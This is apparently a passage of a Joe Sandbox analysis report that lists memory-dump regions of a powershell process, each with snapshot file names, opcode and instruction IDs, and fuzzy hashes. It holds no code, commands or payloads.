                                                                                                                                                                                • Opcode ID: c403982d8d14a781829e72eb0af5d2e4073178ef3966844067f8567927ccf56d
                                                                                                                                                                                • Instruction ID: 13e8e5a568fb5672ee7e575e6d8585a4295a088f2fd232857cefca3a6069c455
                                                                                                                                                                                • Opcode Fuzzy Hash: c403982d8d14a781829e72eb0af5d2e4073178ef3966844067f8567927ccf56d
                                                                                                                                                                                • Instruction Fuzzy Hash: 83F0F931500259AFDF15DF54C915B9E7BB6AF48300F204469E9016B361CB769D10DBA5
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.2170083500.0000000008B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 08B50000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_8b50000_powershell.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 2c230cee095ac238e74d1e517d669b2d43b9f2eeae3c73a1962c77c266267b89
                                                                                                                                                                                • Instruction ID: d7debe9be660f3f4eb8ece8a24c2d80bd2de537fea4bd162d8953d0bd79e2b6b
                                                                                                                                                                                • Opcode Fuzzy Hash: 2c230cee095ac238e74d1e517d669b2d43b9f2eeae3c73a1962c77c266267b89
                                                                                                                                                                                • Instruction Fuzzy Hash: 38F08235A00715DFCB24DB65D00895AF7E6EF85222B10856DD46A97700CF30FC41CB94
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.2170083500.0000000008B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 08B50000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_8b50000_powershell.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 9b10944de806459310b73e00df796a4d11f949cb5faae54a94304fda4a38741e
                                                                                                                                                                                • Instruction ID: 0883a14a1666140965efed4f7436ce210118688f60829960d4a874a6fc15c343
                                                                                                                                                                                • Opcode Fuzzy Hash: 9b10944de806459310b73e00df796a4d11f949cb5faae54a94304fda4a38741e
                                                                                                                                                                                • Instruction Fuzzy Hash: A0F0D471E002299F8B44DFAEC8009DEBBF9EF8C611B10816AD508E7320E77099028BE4
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.2174700822.0000000008DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08DE0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_8de0000_powershell.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 2ed6cf06c7f88fecbd748a453548c3286cebc5e7d06dc6d980c88f16dfaa2a2d
                                                                                                                                                                                • Instruction ID: af14a2d82a99bffcf2cefad0402ea1ea3344d4ab86ebe467e2f0ce6374658fcc
                                                                                                                                                                                • Opcode Fuzzy Hash: 2ed6cf06c7f88fecbd748a453548c3286cebc5e7d06dc6d980c88f16dfaa2a2d
                                                                                                                                                                                • Instruction Fuzzy Hash: 0BF0B775E00219EF8F40DFA9D8049EEBBF5FB4C250B10812AE919E3310E7359A10DF90
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.2169815315.0000000008B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 08B30000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_8b30000_powershell.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: b1f12c5d71577cff955a108fed2e5e67e6968ab08547316c5c74b1d1af38f798
                                                                                                                                                                                • Instruction ID: a97938ef085358daf620104766dc254aaa1f3b919bf51ff055d4a3857d3e3742
                                                                                                                                                                                • Opcode Fuzzy Hash: b1f12c5d71577cff955a108fed2e5e67e6968ab08547316c5c74b1d1af38f798
                                                                                                                                                                                • Instruction Fuzzy Hash: 43F01470A00614CFD718CF29C554A9ABBF2FF8C311F14C5A8D446AB360DB30A905CF40
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.2169815315.0000000008B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 08B30000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_8b30000_powershell.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: e6f488d308504bc732ccb4c9ee045b38c4ce9eaa6a42d5d0bb1c2b7c0b924d18
                                                                                                                                                                                • Instruction ID: fe7c93fa503bd990761852732b87ff507c8040c93bcabc7d492443405da4a4e6
                                                                                                                                                                                • Opcode Fuzzy Hash: e6f488d308504bc732ccb4c9ee045b38c4ce9eaa6a42d5d0bb1c2b7c0b924d18
                                                                                                                                                                                • Instruction Fuzzy Hash: 8FF02072800B01ABD310CB09E800F86FFE5FF88310F01C22AE5088B681DBB0E881C7D0
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.2166948372.00000000087E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 087E0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_87e0000_powershell.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: bae30ca76423b7d3859422041a534254ad151a0e2064f795708e8b99c6169d98
                                                                                                                                                                                • Instruction ID: ef5d0bb9ff985be1ba362368151715d6b8c0e280b2407a93e264964f6b26d2ea
                                                                                                                                                                                • Opcode Fuzzy Hash: bae30ca76423b7d3859422041a534254ad151a0e2064f795708e8b99c6169d98
                                                                                                                                                                                • Instruction Fuzzy Hash: DCF05E311093C9AFCB038E5498518A57F71AF4A218B1880CAF9888B167D636D927EBA1
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.2174700822.0000000008DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08DE0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_8de0000_powershell.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: de7fada93ae55ccdd0e553cd11a654b565f09e6a46b8f6a0e0ff237237e7eb3b
                                                                                                                                                                                • Instruction ID: 39eb32e4faa42df0c4750973ebfaf222c02733ca6fc0bcf89e1b12a7a450b5e5
                                                                                                                                                                                • Opcode Fuzzy Hash: de7fada93ae55ccdd0e553cd11a654b565f09e6a46b8f6a0e0ff237237e7eb3b
                                                                                                                                                                                • Instruction Fuzzy Hash: 15F0F470E01249CFDF20DFA6C144FADB7B1FF04386F04A159E41567261D339A846CB11
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.2174534655.0000000008DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08DD0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_8dd0000_powershell.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: f0783ed73dabfe9a4cff63f7baba2cc16c1ab800cb123f65c1b05c3f1e265aa8
                                                                                                                                                                                • Instruction ID: 9d6c4eb8de409435f6045543f7d7363878353a66450c2f462389ca137cb7741b
                                                                                                                                                                                • Opcode Fuzzy Hash: f0783ed73dabfe9a4cff63f7baba2cc16c1ab800cb123f65c1b05c3f1e265aa8
                                                                                                                                                                                • Instruction Fuzzy Hash: B1F0BC79A512048FCB08CF69E480D98B3B2FF98325B2281A5E9018B372D731ED01CB90
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.2170083500.0000000008B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 08B50000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_8b50000_powershell.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 498c223d0e6a4534b83d3d2a422a36e85eeeed6a3e9a118ac2524e69764adf87
                                                                                                                                                                                • Instruction ID: 7416e46e90f4d3d98d205aefc743fc461d070e3892f70c9c9e3140734845f9f1
                                                                                                                                                                                • Opcode Fuzzy Hash: 498c223d0e6a4534b83d3d2a422a36e85eeeed6a3e9a118ac2524e69764adf87
                                                                                                                                                                                • Instruction Fuzzy Hash: DFE0C6263063500BC30B62AE186031E3BAE9FC202170E02ABC02CCB3E2CD188C038BB4
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.2170083500.0000000008B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 08B50000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_8b50000_powershell.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: cdd1fd2cff741bd6e98798e49191f9f45924d7970a431bb243119e2ab68d9434
                                                                                                                                                                                • Instruction ID: bcc0786e5a7568c4b6e91aac6c2bfa02835a953b7f0c977bea5e1adb0bba5102
                                                                                                                                                                                • Opcode Fuzzy Hash: cdd1fd2cff741bd6e98798e49191f9f45924d7970a431bb243119e2ab68d9434
                                                                                                                                                                                • Instruction Fuzzy Hash: B2E01A72A10258EEDB50DFB08A457EE7AF9EB00206F1445FA9809E1561E7348769AA60
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.2174534655.0000000008DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08DD0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_8dd0000_powershell.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 324676b37b7dea837341dd810fe32a8ccea5c5e2f75cd1e25eba8aad1acf40ae
                                                                                                                                                                                • Instruction ID: e30ae2e7dfff217ed9825b03e72bd6f5d184ef85948ba08c8ca4a6c66a957093
                                                                                                                                                                                • Opcode Fuzzy Hash: 324676b37b7dea837341dd810fe32a8ccea5c5e2f75cd1e25eba8aad1acf40ae
                                                                                                                                                                                • Instruction Fuzzy Hash: 3BF03936700209DFCB44CF94E4509DEFBB2FF88225B24C219E80597306D731D852CB51
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.2174700822.0000000008DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08DE0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_8de0000_powershell.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 66fdf6416c762e68c3397e39d30e59e8468f178d3543bece7066ac7e6d8fbeb3
                                                                                                                                                                                • Instruction ID: 53ebafebc16a25913964bd6287d1ceee797ef24d85f9af7435e9f56576cc7783
                                                                                                                                                                                • Opcode Fuzzy Hash: 66fdf6416c762e68c3397e39d30e59e8468f178d3543bece7066ac7e6d8fbeb3
                                                                                                                                                                                • Instruction Fuzzy Hash: ABF0ED35B01218CFDB44EFA0D848AADB7B1FF44356F21466AE90597254EB74AD05CB40
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.2169815315.0000000008B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 08B30000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_8b30000_powershell.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: bc0d383a6db04ab15c25cd4e8d97ef524c77498f105336fa38d1b0191fc6cebb
                                                                                                                                                                                • Instruction ID: dd2435cb10eb962d4f11402a5a2cf23c9295ca4715b4b2a35367e3fb49affda8
                                                                                                                                                                                • Opcode Fuzzy Hash: bc0d383a6db04ab15c25cd4e8d97ef524c77498f105336fa38d1b0191fc6cebb
                                                                                                                                                                                • Instruction Fuzzy Hash: EEE086316473609BCF225B75A4585AA3BB4FFC1766F2941FEDC4ACA206D5A48841C750
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.2174700822.0000000008DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08DE0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_8de0000_powershell.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 0e2929fae83516cea3c61b65a679af4af941d3685a8bdc10e4dbbf88dd952e7c
                                                                                                                                                                                • Instruction ID: 18e5a3a33e3df561cf7cecf430cb1e4ae3a7b70d678bf73bf3abdd70bc43e057
                                                                                                                                                                                • Opcode Fuzzy Hash: 0e2929fae83516cea3c61b65a679af4af941d3685a8bdc10e4dbbf88dd952e7c
                                                                                                                                                                                • Instruction Fuzzy Hash: 80D05E723005107FE314518EAC05FFBB6AEDBCAB22F15C07AB2099B2818DA5DC0143F0
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.2174381658.0000000008DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08DC0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_8dc0000_powershell.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 93d62f75dbf1a21d380ce914ec93b826d2f8a90c94df03dd2ba5555971140842
                                                                                                                                                                                • Instruction ID: 54ada6ffcbc19279f623c5ca94fbd8fa0a6c75873fbc9cb20e58b119d4adcf39
                                                                                                                                                                                • Opcode Fuzzy Hash: 93d62f75dbf1a21d380ce914ec93b826d2f8a90c94df03dd2ba5555971140842
                                                                                                                                                                                • Instruction Fuzzy Hash: 55E01230304726CFD7649669D460A66B3DADB452A5F008A3DD45BD7740EF75FC018B84
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.2174700822.0000000008DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08DE0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_8de0000_powershell.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 99d650fe8cb026b03a035fbb817e284058a627a2ccc42ab13ad342418a21930c
                                                                                                                                                                                • Instruction ID: be4e92f303f100a11ad08ada3d94bc7d8095f2c83256e8b2d59a415f9a604cce
                                                                                                                                                                                • Opcode Fuzzy Hash: 99d650fe8cb026b03a035fbb817e284058a627a2ccc42ab13ad342418a21930c
                                                                                                                                                                                • Instruction Fuzzy Hash: 57D0C936B00105CFDB44EFA4E884AADB7B4FF4426AF2142AAE61597221D331EA56CB41
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.2166948372.00000000087E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 087E0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_87e0000_powershell.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 65b382f2b373dd0e42861b0c7a885679bbca07c8995822aa41ad6b5fde29ea02
                                                                                                                                                                                • Instruction ID: 2f1addc7ac752b055209e5a892d08ee60b8d95dd5987d24a20b0db1062a2c8ce
                                                                                                                                                                                • Opcode Fuzzy Hash: 65b382f2b373dd0e42861b0c7a885679bbca07c8995822aa41ad6b5fde29ea02
                                                                                                                                                                                • Instruction Fuzzy Hash: CFD06736104249AF8B01CE84D951C6A7F6AEB49214B14C049BE5946262C633E932EBA0
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.2169815315.0000000008B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 08B30000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_8b30000_powershell.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: fb960a6b320309828d7cb1459a2434c1967bc3c50cf9cffb5ca092441ad62b56
                                                                                                                                                                                • Instruction ID: f99a0980dd543a7d7291e73ffb92e51bd6822839afaf6de3ba9f68da388073bc
                                                                                                                                                                                • Opcode Fuzzy Hash: fb960a6b320309828d7cb1459a2434c1967bc3c50cf9cffb5ca092441ad62b56
                                                                                                                                                                                • Instruction Fuzzy Hash: 28D012736152A04ECF418A3145E4FA13FA0BB45113B1D40E9D848DF357E524D455DB71
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.2174700822.0000000008DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08DE0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_8de0000_powershell.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 4ed978dae006a132c259518be520fe9069b73a8fd65cc3401a889b6ccdee6776
                                                                                                                                                                                • Instruction ID: 36536afc8bb00b62af8d47eb3074d8ffc8e0cfb9d8eb8c92a890fbca4234f6f6
                                                                                                                                                                                • Opcode Fuzzy Hash: 4ed978dae006a132c259518be520fe9069b73a8fd65cc3401a889b6ccdee6776
                                                                                                                                                                                • Instruction Fuzzy Hash: 0BD09235A00018CBCF04DFC8D8447DCF7B1FB8836AF1480AAD918B7281C776A956CB64
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.2169815315.0000000008B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 08B30000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_8b30000_powershell.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: f1da48afbcd19ed3a701ed5474437f5ca5ef6b207d360590ec5c1d365a0ac075
                                                                                                                                                                                • Instruction ID: cdb126f9de6e2d77c9515e008aa15cbf32bcab2f8d22dcb11555f212c994b79e
                                                                                                                                                                                • Opcode Fuzzy Hash: f1da48afbcd19ed3a701ed5474437f5ca5ef6b207d360590ec5c1d365a0ac075
                                                                                                                                                                                • Instruction Fuzzy Hash: 29D0A7B540C3C48BCB15DB64B6D5DC1BF604F16221F0984DEC5C00B473C0294424DB12
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.2169815315.0000000008B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 08B30000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_8b30000_powershell.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 3543594cefebbad7f357d94d4ca891486bb79a0d67da2a61fdfd292c73342e8f
                                                                                                                                                                                • Instruction ID: 7e9c5de4717646d19547b9c706410f5436e717fd65026f11eb99121fd1db8386
                                                                                                                                                                                • Opcode Fuzzy Hash: 3543594cefebbad7f357d94d4ca891486bb79a0d67da2a61fdfd292c73342e8f
                                                                                                                                                                                • Instruction Fuzzy Hash: 17C0023A640058CF9704DA99E5458D8BBB0EFA8322B5100E6E60597A61C731ED65CA50
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.2174381658.0000000008DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08DC0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_8dc0000_powershell.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: d617c5c2e9d4bbd3e2a99c4b5d351f8ad244ec251a8b639315f3df4792e8840a
                                                                                                                                                                                • Instruction ID: 6bb97e52404be5406b9a01f69c0d32aea7c367bbf4025ce5bcb5df8a95d9642a
                                                                                                                                                                                • Opcode Fuzzy Hash: d617c5c2e9d4bbd3e2a99c4b5d351f8ad244ec251a8b639315f3df4792e8840a
                                                                                                                                                                                • Instruction Fuzzy Hash: 31B09237B04028EBDF086A8AF9042EDF325E7C8776F10567BD21E82A828B7149664691
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.2174700822.0000000008DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08DE0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_8de0000_powershell.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 104384760c96584e1c5edd5cae6ed608bf735ea46ae5d6ed6b1f25c700ddffb7
                                                                                                                                                                                • Instruction ID: 48dd8479d5063d4be22e798b7a5bb2e74f213407087f6ef6f31ceb787385eb93
                                                                                                                                                                                • Opcode Fuzzy Hash: 104384760c96584e1c5edd5cae6ed608bf735ea46ae5d6ed6b1f25c700ddffb7
                                                                                                                                                                                • Instruction Fuzzy Hash: 82C0927A150208EFC740DF69E848C45BBB8EF19770711C0A1FA088B332C732E820DA94
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.2174534655.0000000008DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08DD0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_8dd0000_powershell.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 79bcb62f22914cdde0ac6e3e4ca75b9336ba88888a23bd8676a477d9f47fc270
                                                                                                                                                                                • Instruction ID: 9ff0356d493ebaaff3b28742d327b3c10b87fc7ac643a1943c235216a6e0ddc7
                                                                                                                                                                                • Opcode Fuzzy Hash: 79bcb62f22914cdde0ac6e3e4ca75b9336ba88888a23bd8676a477d9f47fc270
                                                                                                                                                                                • Instruction Fuzzy Hash: 04B09237A04108C9DB008AC6B841BEDF720E790266F104127C21051000933152688693
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.2174700822.0000000008DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08DE0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_8de0000_powershell.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: fa3235a201bb0fe260959cb9b1d708e6692c76d25554da47b9c6629e3bad1601
                                                                                                                                                                                • Instruction ID: 96a74fec5220f98754945e00ce640a92889f3d2d232068f8612b65c1e83e2114
                                                                                                                                                                                • Opcode Fuzzy Hash: fa3235a201bb0fe260959cb9b1d708e6692c76d25554da47b9c6629e3bad1601
                                                                                                                                                                                • Instruction Fuzzy Hash: B4B092351502088F82009B68E448C4073E8AB08A253114090E10C8B232C621FC008A40
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.2166948372.00000000087E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 087E0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_87e0000_powershell.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: t(q
                                                                                                                                                                                • API String ID: 0-3080623236
                                                                                                                                                                                • Opcode ID: 0338ad83cc98cf0ec9f6f36720e69ecfb7590e5ebc1485edaa6573d1fc3914d6
                                                                                                                                                                                • Instruction ID: a4e6d020261da611fbb2599c4298e17660658b7b95217456ef771f0229e2b445
                                                                                                                                                                                • Opcode Fuzzy Hash: 0338ad83cc98cf0ec9f6f36720e69ecfb7590e5ebc1485edaa6573d1fc3914d6
                                                                                                                                                                                • Instruction Fuzzy Hash: B2A30A74E016589FEB54DF64CD44BDEB7B2EB89300F0045E98209AF294DB79AE81DF90
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.2166948372.00000000087E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 087E0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_87e0000_powershell.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: t(q
                                                                                                                                                                                • API String ID: 0-3080623236
                                                                                                                                                                                • Opcode ID: c628c4d4e99dc3ad1cdae123f6ecb094d2a9fd9d8c4868cd6c0109de07c15fbd
                                                                                                                                                                                • Instruction ID: abc60e78a72301cc5a22c0612d8810a3bcf123b40a1e6e947bc9e22baff7bb3e
                                                                                                                                                                                • Opcode Fuzzy Hash: c628c4d4e99dc3ad1cdae123f6ecb094d2a9fd9d8c4868cd6c0109de07c15fbd
                                                                                                                                                                                • Instruction Fuzzy Hash: 2CA3FA74E016589FEB54DF64CD44BDEB7B2EB89300F0045E88209AF294DB79AE81DF90
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.2172245439.0000000008C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 08C90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_8c90000_powershell.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: "$@
                                                                                                                                                                                • API String ID: 0-1136454570
                                                                                                                                                                                • Opcode ID: 5f98971b653850c81acc06cb851bcc19c768fd89e522ad1bf3ef581a55a9fae6
                                                                                                                                                                                • Instruction ID: 5f89dda474dbf28a4604f3a2ad4cb9333d1883a59d650caa603697c62029b5ab
                                                                                                                                                                                • Opcode Fuzzy Hash: 5f98971b653850c81acc06cb851bcc19c768fd89e522ad1bf3ef581a55a9fae6
                                                                                                                                                                                • Instruction Fuzzy Hash: 9732AD34B00204CFDF14DFA9D59866EBBF2BF88702F1484AED546AB340DB74A942CB91
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.2172791888.0000000008D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 08D10000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_8d10000_powershell.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 0-3916222277
                                                                                                                                                                                • Opcode ID: 895126de02032d9e9439779d526ec5d0a412559d8f532e0b6d9fa5c1dc352b81
                                                                                                                                                                                • Instruction ID: 942c7fb50d6bfcc5009ab242c613d7515ff07d9506bf3e6a47c53ef495c9b986
                                                                                                                                                                                • Opcode Fuzzy Hash: 895126de02032d9e9439779d526ec5d0a412559d8f532e0b6d9fa5c1dc352b81
